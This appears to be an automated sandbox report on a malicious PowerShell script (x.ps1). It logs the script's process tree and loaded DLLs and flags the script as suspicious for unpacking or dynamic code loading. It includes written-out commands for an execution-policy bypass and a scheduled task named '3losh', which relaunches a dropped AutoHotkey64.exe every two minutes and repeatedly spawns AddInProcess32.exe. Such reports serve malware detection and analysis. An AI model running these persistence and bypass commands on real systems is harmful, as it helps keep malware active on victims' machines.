Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lolkrnlj.vyx.ps1

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\x.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\Public\Documents\AutoHotkey64.exe "C:\Users\Public\Documents\AutoHotkey64.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /tn 3losh /tr C:\Users\Public\Documents\AutoHotkey64.exe /sc minute /mo 2 /st 04:23 /f
Source: unknown	Process created: C:\Users\Public\Documents\AutoHotkey64.exe C:\Users\Public\Documents\AutoHotkey64.exe
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: unknown	Process created: C:\Users\Public\Documents\AutoHotkey64.exe C:\Users\Public\Documents\AutoHotkey64.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\Public\Documents\AutoHotkey64.exe "C:\Users\Public\Documents\AutoHotkey64.exe"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /tn 3losh /tr C:\Users\Public\Documents\AutoHotkey64.exe /sc minute /mo 2 /st 04:23 /f	Jump to behavior
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskflowdataengine.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cdp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dsreg.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: cryptbase.dll
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Section loaded: wsock32.dll
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Section loaded: winmm.dll
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Section loaded: version.dll
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Section loaded: wininet.dll
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Section loaded: uxtheme.dll
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Section loaded: textshaping.dll
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Section loaded: windows.storage.dll
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Section loaded: wldp.dll

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: x.ps1

Static file information: File size 2113070 > 1048576

Source:

Data Obfuscation

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

